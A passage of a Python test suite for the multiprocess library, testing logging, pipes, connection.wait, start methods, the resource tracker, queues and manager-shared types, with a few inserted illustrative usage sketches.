self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
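# --- Illustrative sketch (not part of the test suite) ---------------------
# _TestLogging above only checks logger levels.  Typical application usage
# goes through the log_to_stderr() helper, which attaches a stream handler
# to the module logger so worker start/stop events become visible.  A sketch
# assuming the standard-library multiprocessing module; never called by the
# tests.
def _sketch_enable_multiprocessing_logging():
    import logging
    import multiprocessing as _mp
    logger = _mp.log_to_stderr()
    logger.setLevel(logging.INFO)
    logger.info('process events will now be reported on stderr')
    return logger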
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocess.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocess.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocess.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocess.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocess.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
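# --- Illustrative sketch (not part of the test suite) ---------------------
# TestWait above drives connection.wait(), which blocks until at least one
# of the given connections/sockets/sentinels is ready and returns that
# subset (an empty list on timeout).  A single-process sketch, assuming the
# standard-library multiprocessing module; never called by the tests.
def _sketch_connection_wait():
    import multiprocessing as _mp
    from multiprocessing.connection import wait
    a, b = _mp.Pipe()
    assert wait([a, b], timeout=0.1) == []   # nothing readable yet
    b.send('ping')                           # makes the other end readable
    ready = wait([a, b], timeout=5)
    assert ready == [a]
    assert a.recv() == 'ping'
    a.close()
    b.close()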
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def _test_flags(self):
import json
# start child process using unusual flags
prog = ('from multiprocess.tests import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
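# --- Illustrative sketch (not part of the test suite) ---------------------
# TestNoForkBomb above checks the rule behind mp_fork_bomb.py: with the
# 'spawn' and 'forkserver' start methods the main module is re-imported in
# every child, so process creation must sit behind an
# ``if __name__ == '__main__'`` guard or the script would spawn children
# without bound.  The canonical safe layout of such a script is sketched
# below as a string constant; it is illustrative only and never executed.
_SAFE_MAIN_GUARD_SKETCH = """\
import multiprocessing
def worker():
    print('hello from the child')
if __name__ == '__main__':
    multiprocessing.freeze_support()   # harmless outside frozen executables
    p = multiprocessing.Process(target=worker)
    p.start()
    p.join()
"""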
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def _test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocess as mp
from multiprocess import resource_tracker
from multiprocess.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
                expected = ('resource_tracker: There appear to be 2 '
                            'leaked {} objects'.format(rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocess.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocess.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
        # context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocess.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
    # The child.
    @classmethod
    def _test_list(cls, obj):
        assert obj[0] == 5
        obj.append(6)
    # The parent.
    def test_list(self):
        o = self.manager.list()
        o.append(5)
        self.run_worker(self._test_list, o)
        assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocess.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
    def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in not_exported are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
not_exported=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
